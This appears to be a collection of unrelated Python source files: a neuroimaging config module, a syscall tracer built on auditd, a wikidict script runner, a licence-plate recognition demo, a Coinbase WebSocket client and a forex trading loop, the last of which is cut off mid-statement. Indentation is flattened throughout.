| source | python |
|---|---|
config.py
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
r"""
A Python module to maintain unique, run-wide *aslprep* settings.
This module implements the memory structures to keep a consistent, singleton config.
Settings are passed across processes via filesystem, and a copy of the settings for
each run and subject is left under
``<output_dir>/sub-<participant_id>/log/<run_unique_id>/aslprep.toml``.
Settings are stored using :abbr:`TOML (Tom's Obvious, Minimal Language)`.
The module has a :py:func:`~aslprep.config.to_filename` function to allow writing out
the settings to the hard disk in *TOML* format, which looks like:
.. literalinclude:: ../aslprep/data/tests/config.toml
:language: toml
:name: aslprep.toml
:caption: **Example file representation of aslprep settings**.
This config file is used to pass the settings across processes,
using the :py:func:`~aslprep.config.load` function.
Configuration sections
----------------------
.. autoclass:: environment
:members:
.. autoclass:: execution
:members:
.. autoclass:: workflow
:members:
.. autoclass:: nipype
:members:
Usage
-----
A config file is used to pass settings and collect information as the execution
graph is built across processes.
.. code-block:: Python
from aslprep import config
config_file = config.execution.work_dir / '.aslprep.toml'
config.to_filename(config_file)
# Call build_workflow(config_file, retval) in a subprocess
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
config.load(config_file)
# Access configs from any code section as:
value = config.section.setting
Logging
-------
.. autoclass:: loggers
:members:
Other responsibilities
----------------------
The :py:mod:`config` module is responsible for other convenience actions:
* Switching Python's :obj:`multiprocessing` to *forkserver* mode.
* Setting up a filter for warnings as early as possible.
* Automated I/O magic operations. Some conversions need to happen in the
store/load processes (e.g., from/to :obj:`~pathlib.Path` \<-\> :obj:`str`,
:py:class:`~bids.layout.BIDSLayout`, etc.)
"""
from multiprocessing import set_start_method
try:
set_start_method('forkserver')
except RuntimeError:
pass # context has been already set
finally:
# Defer all custom imports until after the forkserver is initialized and
# the most annoying warnings are ignored
import os
import sys
import random
from uuid import uuid4
from pathlib import Path
from time import strftime
from nipype import logging as nlogging, __version__ as _nipype_ver
from templateflow import __version__ as _tf_ver
from . import __version__
if not hasattr(sys, "_is_pytest_session"):
sys._is_pytest_session = False # Trick to avoid sklearn's FutureWarnings
# Disable all warnings in main and children processes only on production versions
if not any((
"+" in __version__,
__version__.endswith(".dirty"),
os.getenv("aslprep_DEV", "0").lower() in ("1", "on", "true", "y", "yes")
)):
from ._warnings import logging
os.environ["PYTHONWARNINGS"] = "ignore"
elif os.getenv("aslprep_WARNINGS", "0").lower() in ("1", "on", "true", "y", "yes"):
# allow disabling warnings on development versions
from ._warnings import logging
else:
import logging
logging.addLevelName(25, 'IMPORTANT') # Add a new level between INFO and WARNING
logging.addLevelName(15, 'VERBOSE') # Add a new level between INFO and DEBUG
DEFAULT_MEMORY_MIN_GB = 0.01
_exec_env = os.name
_docker_ver = None
# special variable set in the container
if os.getenv('IS_DOCKER_8395080871'):
_exec_env = 'singularity'
_cgroup = Path('/proc/1/cgroup')
if _cgroup.exists() and 'docker' in _cgroup.read_text():
_docker_ver = os.getenv('DOCKER_VERSION_8395080871')
_exec_env = 'aslprep-docker' if _docker_ver else 'docker'
del _cgroup
_fs_license = os.getenv('FS_LICENSE')
if not _fs_license and os.getenv('FREESURFER_HOME'):
_fs_home = os.getenv('FREESURFER_HOME')
if _fs_home and (Path(_fs_home) / "license.txt").is_file():
_fs_license = str(Path(_fs_home) / "license.txt")
del _fs_home
_templateflow_home = Path(os.getenv(
'TEMPLATEFLOW_HOME',
os.path.join(os.getenv('HOME'), '.cache', 'templateflow'))
)
try:
from psutil import virtual_memory
_free_mem_at_start = round(virtual_memory().free / 1024**3, 1)
except Exception:
_free_mem_at_start = None
_oc_limit = 'n/a'
_oc_policy = 'n/a'
try:
# Memory policy may have a large effect on types of errors experienced
_proc_oc_path = Path('/proc/sys/vm/overcommit_memory')
if _proc_oc_path.exists():
_oc_policy = {
'0': 'heuristic', '1': 'always', '2': 'never'
}.get(_proc_oc_path.read_text().strip(), 'unknown')
if _oc_policy != 'never':
_proc_oc_kbytes = Path('/proc/sys/vm/overcommit_kbytes')
if _proc_oc_kbytes.exists():
_oc_limit = _proc_oc_kbytes.read_text().strip()
if _oc_limit in ('0', 'n/a') and Path('/proc/sys/vm/overcommit_ratio').exists():
_oc_limit = '{}%'.format(
Path('/proc/sys/vm/overcommit_ratio').read_text().strip()
)
except Exception:
pass
class _Config:
"""An abstract class forbidding instantiation."""
_paths = tuple()
def __init__(self):
"""Avert instantiation."""
raise RuntimeError('Configuration type is not instantiable.')
@classmethod
def load(cls, settings, init=True):
"""Store settings from a dictionary."""
for k, v in settings.items():
if v is None:
continue
if k in cls._paths:
setattr(cls, k, Path(v).absolute())
continue
if hasattr(cls, k):
setattr(cls, k, v)
if init:
try:
cls.init()
except AttributeError:
pass
@classmethod
def get(cls):
"""Return defined settings."""
from .niworkflows.utils.spaces import SpatialReferences, Reference
out = {}
for k, v in cls.__dict__.items():
if k.startswith('_') or v is None:
continue
if callable(getattr(cls, k)):
continue
if k in cls._paths:
v = str(v)
if isinstance(v, SpatialReferences):
v = " ".join([str(s) for s in v.references]) or None
if isinstance(v, Reference):
v = str(v) or None
out[k] = v
return out
class environment(_Config):
"""
Read-only options regarding the platform and environment.
Crawls runtime descriptive settings (e.g., default FreeSurfer license,
execution environment, nipype and *aslprep* versions, etc.).
The ``environment`` section is not loaded in from file,
only written out when settings are exported.
This config section is useful when reporting issues,
and these variables are tracked whenever the user does not
opt out using the ``--notrack`` argument.
"""
cpu_count = os.cpu_count()
"""Number of available CPUs."""
exec_docker_version = _docker_ver
"""Version of Docker Engine."""
exec_env = _exec_env
"""A string representing the execution platform."""
free_mem = _free_mem_at_start
"""Free memory at start."""
overcommit_policy = _oc_policy
"""Linux's kernel virtual memory overcommit policy."""
overcommit_limit = _oc_limit
"""Linux's kernel virtual memory overcommit limits."""
nipype_version = _nipype_ver
"""Nipype's current version."""
templateflow_version = _tf_ver
"""The TemplateFlow client version installed."""
version = __version__
"""*aslprep*'s version."""
class nipype(_Config):
"""Nipype settings."""
crashfile_format = 'txt'
"""The file format for crashfiles, either text or pickle."""
get_linked_libs = False
"""Run NiPype's tool to enlist linked libraries for every interface."""
memory_gb = None
"""Estimation in GB of the RAM this workflow can allocate at any given time."""
nprocs = os.cpu_count()
"""Number of processes (compute tasks) that can be run in parallel (multiprocessing only)."""
omp_nthreads = None
"""Number of CPUs a single process can access for multithreaded execution."""
plugin = 'MultiProc'
"""NiPype's execution plugin."""
plugin_args = {
'maxtasksperchild': 1,
'raise_insufficient': False,
}
"""Settings for NiPype's execution plugin."""
resource_monitor = False
"""Enable resource monitor."""
stop_on_first_crash = True
"""Whether the workflow should stop or continue after the first error."""
@classmethod
def get_plugin(cls):
"""Format a dictionary for Nipype consumption."""
out = {
'plugin': cls.plugin,
'plugin_args': cls.plugin_args,
}
if cls.plugin in ('MultiProc', 'LegacyMultiProc'):
out['plugin_args']['n_procs'] = int(cls.nprocs)
if cls.memory_gb:
out['plugin_args']['memory_gb'] = float(cls.memory_gb)
return out
@classmethod
def init(cls):
"""Set NiPype configurations."""
from nipype import config as ncfg
# Configure resource_monitor
if cls.resource_monitor:
ncfg.update_config({
'monitoring': {
'enabled': cls.resource_monitor,
'sample_frequency': '0.5',
'summary_append': True,
}
})
ncfg.enable_resource_monitor()
# Nipype config (logs and execution)
ncfg.update_config({
'execution': {
'crashdump_dir': str(execution.log_dir),
'crashfile_format': cls.crashfile_format,
'get_linked_libs': cls.get_linked_libs,
'stop_on_first_crash': cls.stop_on_first_crash,
}
})
if cls.omp_nthreads is None:
cls.omp_nthreads = min(cls.nprocs - 1 if cls.nprocs > 1 else os.cpu_count(), 8)
class execution(_Config):
"""Configure run-level settings."""
anat_derivatives = None
"""A path where anatomical derivatives are found to fast-track *sMRIPrep*."""
bids_dir = None
"""An existing path to the dataset, which must be BIDS-compliant."""
bids_description_hash = None
"""Checksum (SHA256) of the ``dataset_description.json`` of the BIDS dataset."""
bids_filters = None
"""A dictionary of BIDS selection filters."""
boilerplate_only = False
"""Only generate a boilerplate."""
debug = False
"""Run in sloppy mode (meaning, suboptimal parameters that minimize run-time)."""
echo_idx = None
"""Select a particular echo for multi-echo EPI datasets."""
fs_license_file = _fs_license
"""An existing file containing a FreeSurfer license."""
fs_subjects_dir = None
"""FreeSurfer's subjects directory."""
layout = None
"""A :py:class:`~bids.layout.BIDSLayout` object, see :py:func:`init`."""
log_dir = None
"""The path to a directory that contains execution logs."""
log_level = 25
"""Output verbosity."""
low_mem = None
"""Utilize uncompressed NIfTIs and other tricks to minimize memory allocation."""
md_only_boilerplate = False
"""Do not convert boilerplate from MarkDown to LaTex and HTML."""
notrack = False
"""Do not monitor *aslprep* using Sentry.io."""
output_dir = None
"""Folder where derivatives will be stored."""
output_spaces = None
"""List of (non)standard spaces designated (with the ``--output-spaces`` flag of
the command line) as spatial references for outputs."""
reports_only = False
"""Only build the reports, based on the reportlets found in a cached working directory."""
run_uuid = '%s_%s' % (strftime('%Y%m%d-%H%M%S'), uuid4())
"""Unique identifier of this particular run."""
participant_label = None
"""List of participant identifiers that are to be preprocessed."""
task_id = None
"""Select a particular task from all available in the dataset."""
templateflow_home = _templateflow_home
"""The root folder of the TemplateFlow client."""
work_dir = Path('work').absolute()
"""Path to a working directory where intermediate results will be available."""
write_graph = False
"""Write out the computational graph corresponding to the planned preprocessing."""
_layout = None
_paths = (
'anat_derivatives',
'bids_dir',
'fs_license_file',
'fs_subjects_dir',
'layout',
'log_dir',
'output_dir',
'templateflow_home',
'work_dir',
)
@classmethod
def init(cls):
"""Create a new BIDS Layout accessible with :attr:`~execution.layout`."""
if cls.fs_license_file and Path(cls.fs_license_file).is_file():
os.environ["FS_LICENSE"] = str(cls.fs_license_file)
if cls._layout is None:
import re
from bids.layout import BIDSLayout
work_dir = cls.work_dir / 'bids.db'
work_dir.mkdir(exist_ok=True, parents=True)
cls._layout = BIDSLayout(
str(cls.bids_dir),
validate=False,
# database_path=str(work_dir),
ignore=("code", "stimuli", "sourcedata", "models",
"derivatives", re.compile(r'^\.')))
cls.layout = cls._layout
# These variables are not necessary anymore
del _fs_license
del _exec_env
del _nipype_ver
del _templateflow_home
del _tf_ver
del _free_mem_at_start
del _oc_limit
del _oc_policy
class workflow(_Config):
"""Configure the particular execution graph of this workflow."""
anat_only = False
"""Execute the anatomical preprocessing only."""
asl2t1w_dof = 6
"""Degrees of freedom of the ASL-to-T1w registration steps."""
asl2t1w_init = 'register'
"""Whether to use standard coregistration ('register') or to initialize coregistration from the
ASL image-header ('header')."""
m0_scale = float(1)
"""relative scale between asl and M0."""
fmap_bspline = None
"""Regularize fieldmaps with a field of B-Spline basis."""
fmap_demean = None
"""Remove the mean from fieldmaps."""
force_syn = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation."""
hires = None
"""Run with the ``-hires`` flag."""
ignore = None
"""Ignore particular steps for *aslprep*."""
longitudinal = False
"""Run with the ``-logitudinal`` flag."""
random_seed = None
"""Master random seed to initialize the Pseudorandom Number Generator (PRNG)"""
skull_strip_fixed_seed = False
"""Fix a seed for skull-stripping."""
skull_strip_template = "OASIS30ANTs"
"""Change default brain extraction template."""
skull_strip_t1w = "force"
"""Skip brain extraction of the T1w image (default is ``force``, meaning that
*aslprep* will run brain extraction of the T1w)."""
spaces = None
"""Keeps the :py:class:`~.niworkflows.utils.spaces.SpatialReferences`
instance keeping standard and nonstandard spaces."""
use_bbr = None
"""Run boundary-based registration for ASL-to-T1w registration."""
use_syn_sdc = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation
in the absence of any alternatives."""
dummy_vols = int(0)
"""Number of label-control volume pairs to be deleted before CBF computation."""
smooth_kernel = float(5)
"""Kernel size for smoothing the M0 image."""
scorescrub = False
"""Run SCORE/SCRUB (Sudipto's algorithms) for denoising CBF."""
basil = False
"""Run BASIL (FSL utilities) to compute CBF with spatial regularization and
partial volume correction."""
class loggers:
"""Keep loggers easily accessible (see :py:func:`init`)."""
_fmt = "%(asctime)s,%(msecs)d %(name)-2s " "%(levelname)-2s:\n\t %(message)s"
_datefmt = "%y%m%d-%H:%M:%S"
default = logging.getLogger()
"""The root logger."""
cli = logging.getLogger('cli')
"""Command-line interface logging."""
workflow = nlogging.getLogger('nipype.workflow')
"""NiPype's workflow logger."""
interface = nlogging.getLogger('nipype.interface')
"""NiPype's interface logger."""
utils = nlogging.getLogger('nipype.utils')
"""NiPype's utils logger."""
@classmethod
def init(cls):
"""
Set the log level, initialize all loggers into :py:class:`loggers`.
* Add new logger levels (25: IMPORTANT, and 15: VERBOSE).
* Add a new sub-logger (``cli``).
* Logger configuration.
"""
from nipype import config as ncfg
_handler = logging.StreamHandler(stream=sys.stdout)
_handler.setFormatter(
logging.Formatter(fmt=cls._fmt, datefmt=cls._datefmt)
)
cls.cli.addHandler(_handler)
cls.default.setLevel(execution.log_level)
cls.cli.setLevel(execution.log_level)
cls.interface.setLevel(execution.log_level)
cls.workflow.setLevel(execution.log_level)
cls.utils.setLevel(execution.log_level)
ncfg.update_config({
'logging': {
'log_directory': str(execution.log_dir),
'log_to_file': True
},
})
class seeds(_Config):
"""Initialize the PRNG and track random seed assignments"""
master = None
"""Master seed used to generate all other tracked seeds"""
ants = None
"""Seed used for antsRegistration, antsAI, antsMotionCorr"""
@classmethod
def init(cls):
cls.master = workflow.random_seed
if cls.master is None:
cls.master = random.randint(1, 65536)
random.seed(cls.master) # initialize the PRNG
# functions to set program specific seeds
cls.ants = _set_ants_seed()
def _set_ants_seed():
"""Fix random seed for antsRegistration, antsAI, antsMotionCorr"""
val = random.randint(1, 65536)
os.environ['ANTS_RANDOM_SEED'] = str(val)
return val
def from_dict(settings):
"""Read settings from a flat dictionary."""
nipype.load(settings)
execution.load(settings)
workflow.load(settings)
seeds.init()
loggers.init()
def load(filename):
"""Load settings from file."""
from toml import loads
filename = Path(filename)
settings = loads(filename.read_text())
for sectionname, configs in settings.items():
if sectionname != 'environment':
section = getattr(sys.modules[__name__], sectionname)
section.load(configs)
init_spaces()
def get(flat=False):
"""Get config as a dict."""
settings = {
'environment': environment.get(),
'execution': execution.get(),
'workflow': workflow.get(),
'nipype': nipype.get(),
'seeds': seeds.get(),
}
if not flat:
return settings
return {'.'.join((section, k)): v
for section, configs in settings.items()
for k, v in configs.items()}
def dumps():
"""Format config into toml."""
from toml import dumps
return dumps(get())
def to_filename(filename):
"""Write settings to file."""
filename = Path(filename)
filename.write_text(dumps())
def init_spaces(checkpoint=True):
"""Initialize the :attr:`~workflow.spaces` setting."""
from .niworkflows.utils.spaces import Reference, SpatialReferences
spaces = execution.output_spaces or SpatialReferences()
if not isinstance(spaces, SpatialReferences):
spaces = SpatialReferences(
[ref for s in spaces.split(' ')
for ref in Reference.from_string(s)]
)
if checkpoint and not spaces.is_cached():
spaces.checkpoint()
# Add the default standard space if not already present (required by several sub-workflows)
if "MNI152NLin2009cAsym" not in spaces.get_spaces(nonstandard=False, dim=(3,)):
spaces.add(
Reference("MNI152NLin2009cAsym", {})
)
# Make the SpatialReferences object available
workflow.spaces = spaces
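# Illustrative sketch (not part of the module API; the paths and spaces below are
# placeholders): after settings are loaded, the requested spatial references can be
# initialized and the flattened settings inspected.
#
#     from aslprep import config
#     config.execution.output_spaces = 'MNI152NLin2009cAsym:res-2 T1w'
#     config.init_spaces()
#     print(config.workflow.spaces.get_spaces())
#     print(config.get(flat=True)['workflow.asl2t1w_dof'])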
|
system_call_tracer.py
|
from collections import deque
from datetime import datetime
import psutil
import re
import subprocess
from subprocess import PIPE
import sys
import threading
import time
class SystemCallTracer:
"""System Call Tracer class.
Traces the system calls being made by a process defined by a given
pid. A daemon thread running the _run() method is started at construction
and runs in the background until the application exits.
"""
def __init__(self, trace_pid):
""" Constructor.
Initialize system call sliding window sequence, and background
thread necessary for tracing system calls.
Args:
trace_pid (int): pid of the process to trace.
"""
# Check if the given pid exists
if not psutil.pid_exists(trace_pid):
print("The given pid does not exist!")
sys.exit()
#: int: the pid to trace
self._trace_pid = trace_pid
#: deque of str: the sequence of the 50 most recent system
# calls ordered from oldest to newest
self._syscall_sequence = deque('', 50)
# Create the lock protecting the system call sequence; it must exist
# before the background thread can use it
self._lock = threading.Lock()
# Initialize and start background thread for tracing system
# calls
thread = threading.Thread(target=self._run, daemon=True)
thread.start()
def _run(self):
""" Trace system calls being made by the given pid.
Polls the audit log as often as possible and appends each observed
(call time, system call) pair to the sliding window of the 50 most
recent system calls.
"""
# Add audit rules for tracing the given pid
# TODO: Should we also track system calls made by child
# processes of the process being traced?
# i.e. add 'ppid={pid}' to AUDITCTL_COMMAND
AUDITCTL_COMMAND = \
'sudo auditctl -a always,exit -S all -F pid={pid}'.format(
pid=self._trace_pid)
process = \
subprocess.run(
AUDITCTL_COMMAND,
stdout=PIPE,
stderr=PIPE,
shell=True)
# The time_format_str given to strftime() is the format in which
# ausearch expects time arguments
time_format_str = '%m/%d/%Y %H:%M:%S'
# Set the last_traced_time to the current time
last_traced_time = datetime.now().strftime(time_format_str)
# Get the system calls made by the given pid as often as
# possible
# TODO: Implement realtime streaming from the audit log to
# process each event one by one
while True:
# Set the ausearch command
AUSEARCH_COMMAND = \
'sudo ausearch --interpret --pid {pid} \
--start {last_traced_time}'.format(
pid=self._trace_pid,
last_traced_time=last_traced_time)
# Run the ausearch command and get its output
process = \
subprocess.run(
AUSEARCH_COMMAND,
stdout=PIPE,
stderr=PIPE,
shell=True)
# Update the last traced time
last_traced_time = datetime.now().strftime(time_format_str)
# Get output from the ausearch command
process_output = process.stdout.decode('utf-8').split('\n')
# Parse each line of ausearch output for system calls and
# acquire/release the lock to prevent access of the system
# call sequence before it's finished updating
# TODO: Figure out how to split the pattern string without
# the resulting tabs being included in the regex
# pattern
# Use a raw string so the regex backslashes are not treated as string escapes
pattern = \
re.compile(
r'\((?P<calltime>\d\d/\d\d/\d\d\d\d \d\d:\d\d:\d\d).*syscall=(?P<syscall>\S+)')
with self._lock:
for line in process_output:
# Search the current line for the regex pattern
match = pattern.search(line)
# If a match was found
if match is not None:
# Append the system call to _syscall_sequence
calltime = match.group('calltime')
syscall = match.group('syscall')
self._syscall_sequence.append((calltime, syscall))
def print_trace(self):
""" Print the last 50 system calls.
Prints the sequence of the last 50 system calls ordered from oldest to
newest and prints each system call with its call frequency.
"""
# Acquire/release the lock to prevent access of the system call
# sequence before it's finished printing
with self._lock:
print('**************************************************')
print()
print('Printing the last 50 system calls...')
print()
# Print last 50 system call sequence
print('System call sequence:')
for (calltime, syscall) in self._syscall_sequence:
print(
'({calltime}, \'{syscall}\'), '.format(
calltime=calltime,
syscall=syscall),
end='')
print()
print()
# Calculate system call frequencies
syscall_frequencies = {}
for _, syscall in self._syscall_sequence:
syscall_frequencies[syscall] = \
syscall_frequencies.setdefault(syscall, 0) + 1
# Print system call frequencies
print('System call frequencies:')
for key in sorted(syscall_frequencies):
print(
'\'{syscall}\': {frequency}, '.format(
syscall=key,
frequency=syscall_frequencies[key]),
end='')
print()
print()
print('**************************************************')
print()
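# Illustrative usage sketch (assumptions: auditd's auditctl/ausearch are
# installed, the process has sudo rights, and 1234 is a placeholder pid).
if __name__ == '__main__':
    tracer = SystemCallTracer(trace_pid=1234)
    while True:
        # Periodically dump the sliding window of recent system calls.
        time.sleep(5)
        tracer.print_trace()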
|
__main__.py
|
import subprocess
import sys
import threading
FILES = {
"ca-langs.py": "wikidict/lang/ca/langs.py",
"de-abk.py": "wikidict/lang/de/abk.py",
"de-langs.py": "wikidict/lang/de/langs.py",
"de-lang_adjs.py": "wikidict/lang/de/lang_adjs.py",
"en-form-of.py": "wikidict/lang/en/form_of.py",
"el-langs.py": "wikidict/lang/el/langs.py",
"en-labels.py": "wikidict/lang/en/labels.py",
"en-langs.py": "wikidict/lang/en/langs.py",
"en-places.py": "wikidict/lang/en/places.py",
"es-langs.py": "wikidict/lang/es/langs.py",
"es-campos-semanticos.py": "wikidict/lang/es/campos_semanticos.py",
"fr-domain-templates.py": "wikidict/lang/fr/domain_templates.py",
"fr-langs.py": "wikidict/lang/fr/langs.py",
"fr-regions.py": "wikidict/lang/fr/regions.py",
"fr-temps-geologiques.py": "wikidict/lang/fr/temps_geologiques.py",
"pt-escopo.py": "wikidict/lang/pt/escopos.py",
"pt-gramatica.py": "wikidict/lang/pt/gramatica.py",
"pt-langs.py": "wikidict/lang/pt/langs.py",
}
def replace(file: str, data: str) -> bool:
"""Update contents in the file, even if there was no change."""
with open(file) as fh:
original_content = fh.read()
start = original_content.find("# START")
end = original_content.find("# END")
if start == -1 or end == -1:
return False
new_content = f"{original_content[:start]}# START\n{data}{original_content[end:]}"
with open(file, "w") as fh:
fh.write(new_content)
return True
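# For example (illustrative, not an actual wikidict file), a target file is
# expected to contain a marker-delimited block such as:
#
#     # START
#     langs = {"fr": "French"}
#     # END
#
# replace() swaps everything between "# START" and "# END" with the freshly
# generated data, and returns False when either marker is missing.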
def process_script(script: str, file: str) -> None:
"""Process one script."""
data = subprocess.check_output(["python", f"scripts/{script}"], text=True)
if replace(file, data):
print(f"Processed {script} with success.", flush=True)
else:
print(f" !! Error processing {script}", flush=True)
def main():
"""Entry point."""
threads = []
for script, file in sorted(FILES.items()):
th = threading.Thread(target=process_script, args=(script, file))
th.start()
threads.append(th)
for th in threads:
th.join()
print("\nFriendly reminder: run ./check.sh")
if __name__ == "__main__":
sys.exit(main())
|
test.py
|
import cv2
import time
import threading
from class_CNN import NeuralNetwork
from class_PlateDetection import PlateDetector
from utils.average_plate import *
from utils.find_best_quality_images import get_best_images
########### INIT ###########
# Initialize the plate detector
plateDetector = PlateDetector(type_of_plate='RECT_PLATE',
minPlateArea=4100,
maxPlateArea=15000)
# Initialize the Neural Network
myNetwork = NeuralNetwork(modelFile="model/binary_128_0.50_ver3.pb",
labelFile="model/binary_128_0.50_labels_ver2.txt")
list_char_on_plate = [] # contains an array of the segmented characters in each frame
countPlates = 0 # count the number of same plates
recog_plate = ''
coordinates = (0, 0)
num_frame_without_plates = 0
countPlates_threshold = 11 # the maximum number of images of the same plate to get
###########################
def recognized_plate(list_char_on_plate, size):
"""
Input is a list that contains images of the same plate.
Gets the best images in the list and calculates the average plate value.
"""
global recog_plate
t0 = time.time()
plates_value = []
plates_length = []
list_char_on_plate = get_best_images(list_char_on_plate, num_img_return=7) # get the best images
for segmented_characters in list_char_on_plate:
plate, len_plate = myNetwork.label_image_list(segmented_characters[1], size)
plates_value.append(plate)
plates_length.append(len_plate)
final_plate = get_average_plate_value(plates_value, plates_length) # calculates the average plate
if len(final_plate) > 7:
if (final_plate[2] == '8'):
final_plate = final_plate[:2] + 'B' + final_plate[3:]
elif (final_plate[2] == '0'):
final_plate = final_plate[:2] + 'D' + final_plate[3:]
recog_plate = final_plate
print("recognized plate: " + final_plate)
print("threading time: " + str(time.time() - t0))
cap = cv2.VideoCapture('test_videos/test.MOV') # video path
if __name__=="__main__":
while(cap.isOpened()):
ret, frame = cap.read()
if (frame is None):
print("[INFO] End of Video")
break
_frame = cv2.resize(frame, (960, 540)) # resize the frame to fit the screen
frame_height, frame_width = frame.shape[:2]
_frame_height, _frame_width = _frame.shape[:2]
cropped_frame = frame[int(frame_height*0.3):frame_height, 0:int(frame_width*0.8)] # crop the ROI
cv2.rectangle(_frame, (0, int(_frame_height*0.3)), (int(_frame_width*0.8), _frame_height), (255, 0, 0), 2) # draw a
# rectangle to locate the ROI
# print the result
cv2.rectangle(_frame, (0, 0), (190, 40), (0, 0, 0), -1)
cv2.putText(_frame, recog_plate, (20, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255), 2, cv2.LINE_AA)
# out.write(_frame)
cv2.imshow('video', _frame)
possible_plates = plateDetector.find_possible_plates(cropped_frame)
# cv2.imshow('morphed', plateDetector.after_preprocess)
if possible_plates is not None:
num_frame_without_plates = 0
distance = tracking(coordinates, plateDetector.corresponding_area[0]) # calculates the distance between two plates
coordinates = plateDetector.corresponding_area[0] # get the coordinate of the detected plate
if (distance < 100):
if(countPlates < countPlates_threshold):
cv2.imshow('Plate', possible_plates[0])
temp = []
temp.append(possible_plates[0])
temp.append(plateDetector.char_on_plate[0]) # temp = [image of plate, segmented characters on plate]
list_char_on_plate.append(temp)
countPlates += 1
elif(countPlates == countPlates_threshold):
# create a new thread for image recognition
threading.Thread(target=recognized_plate, args=(list_char_on_plate, 128)).start()
countPlates += 1
else:
countPlates = 0
list_char_on_plate = []
# The program tries to catch 11 images of the same plate and then picks the top 7 best
# quality images out of the 11. However, if it cannot catch enough images, then after
# several consecutive frames without plates it processes the images collected so far
# and calculates the final plate.
if possible_plates is None:
num_frame_without_plates += 1
if (countPlates <= countPlates_threshold and countPlates > 0 and num_frame_without_plates > 5):
threading.Thread(target=recognized_plate, args=(list_char_on_plate, 128)).start()
countPlates = 0
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
websock.py
|
"""The WebSocket Feed provides real-time market data updates for orders and
trades.
Find more here: `<https://docs.exchange.coinbase.com/#websocket-feed>`_
.. module:: websock
:synopsis: WebSocket Feed
.. moduleauthor:: Alexander Simeonov <agsimeon@buffalo.edu>
"""
from json import dumps, loads
from threading import Lock, Thread
from time import sleep
from websocket import create_connection
from cbexchange.client import APIClient
class WSClient(APIClient):
"""API Client for Coinbase Exchange WebSocket Feed.
This class starts in a disconnected state so make sure to connect before
attempting to receive any messages. When using the 'with' statement the
client connects and disconnects automatically.
Once connected the client starts a thread which keeps the WebSocket alive
using periodic pings. There will be only one keep alive thread per client
instance. If the WebSocket connection is somehow lost, the keep alive thread
will clean up and exit.
The client is iterable over the messages in the feed:
:Example:
>>> from cbexchange.websock import WSClient
>>> client = WSClient()
>>> client.connect()
>>> for message in client:
...     print(message)
The client supports the 'with' statement:
:Example:
>>> from cbexchange.websock import WSClient
>>> with WSClient() as client:
...     print(client.receive())
:param str ws_uri: WebSocket URI.
:param str ws_type: `<https://docs.exchange.coinbase.com/#subscribe>`_
:param str ws_product_id: `<https://docs.exchange.coinbase.com/#subscribe>`_
"""
WS_URI = 'wss://ws-feed.exchange.coinbase.com'
WS_TYPE = 'subscribe'
WS_PRODUCT_ID = 'BTC-USD'
def __init__(self, ws_uri=None, ws_type=None, ws_product_id=None):
self.WS_URI = ws_uri or self.WS_URI
self.WS_TYPE = ws_type or self.WS_TYPE
self.WS_PRODUCT_ID = ws_product_id or self.WS_PRODUCT_ID
self._ws = None
self._thread = None
self._lock = Lock()
def __iter__(self):
return self
def __enter__(self):
self.connect()
return self
def __exit__(self, type, value, traceback):
self.disconnect()
def __next__(self):
"""Iterator function for Python 3.
:returns: the next message in the sequence
:rtype: dict
:raises StopIteration: if the WebSocket is not connected
"""
next = self.receive()
if next:
return next
raise StopIteration
# Iterator function for Python 2.
next = __next__
def _format_message(self, message):
"""Makes sure messages are Pythonic.
:param str message: raw message
:returns: Pythonic message
:rtype: dict
"""
return loads(message)
def _keep_alive_thread(self):
"""Used exclusively as a thread which keeps the WebSocket alive."""
while True:
with self._lock:
if self.connected():
self._ws.ping()
else:
self.disconnect()
self._thread = None
return
sleep(30)
def connect(self):
"""Connects and subscribes to the WebSocket Feed."""
if not self.connected():
self._ws = create_connection(self.WS_URI)
message = {
'type':self.WS_TYPE,
'product_id':self.WS_PRODUCT_ID
}
self._ws.send(dumps(message))
# There will be only one keep alive thread per client instance
with self._lock:
if not self._thread:
# Remember the thread so repeated connect() calls do not spawn duplicates
self._thread = Thread(target=self._keep_alive_thread, args=[])
self._thread.start()
def disconnect(self):
"""Disconnects from the WebSocket Feed."""
if self.connected():
self._ws.close()
self._ws = None
def receive(self):
"""Receive the next message in the sequence.
:returns: the next message in the sequence, None if not connected
:rtype: dict
"""
if self.connected():
return self._format_message(self._ws.recv())
return None
def connected(self):
"""Checks if we are connected to the WebSocket Feed.
:returns: True if connected, otherwise False
:rtype: bool
"""
if self._ws:
return self._ws.connected
return False
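# Illustrative sketch (the product id is an example): the feed parameters can
# be overridden per instance through the constructor.
#
#     client = WSClient(ws_product_id='ETH-USD')
#     with client:
#         print(client.receive())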
|
trading.py
|
import copy
from decimal import Decimal, getcontext
import logging
import logging.config
import queue
import threading
import time
from qsforex.execution.execution import OANDAExecutionHandler
from qsforex.portfolio.portfolio import Portfolio
from qsforex import settings
from qsforex.strategy.strategy import TestStrategy
from qsforex.pricing.streaming import StreamingForexPrices
from broker.oanda.common.constants import OANDA_ENVIRONMENTS
def trade(events, strategy, portfolio, execution, heartbeat):
"""
Carries out an infinite while loop that polls the
events queue and directs each event to either the
strategy component or the execution handler. The
loop will then pause for "heartbeat" seconds and
continue.
"""
while True:
try:
event = events.get(False)
except queue.Empty:
pass
else:
if event is not None:
if event.type == 'TICK':
logger.info("Received new tick event: %s", event)
strategy.calculate_signals(event)
portfolio.update_portfolio(event)
elif event.type == 'SIGNAL':
logger.info("Received new signal event: %s", event)
portfolio.execute_signal(event)
elif event.type == 'ORDER':
logger.info("Received new order event: %s", event)
execution.execute_order(event)
time.sleep(heartbeat)
if __name__ == "__main__":
OANDA_STREAM_DOMAIN = OANDA_ENVIRONMENTS["streaming"][settings.OANDA_DOMAIN]
OANDA_API_DOMAIN = OANDA_ENVIRONMENTS["api"][settings.OANDA_DOMAIN]
# Set up logging
logging.config.fileConfig('../logging.conf')
logger = logging.getLogger('qsforex.trading.trading')
# Set the Decimal context precision (significant digits) to 2
getcontext().prec = 2
heartbeat = 0.0 # Time in seconds between polling
events = queue.Queue(maxsize=2000)
equity = settings.EQUITY
# Pairs to include in streaming data set
pairs = ["GBPUSD"]
# Create the OANDA market price streaming class
# making sure to provide authentication commands
prices = StreamingForexPrices(
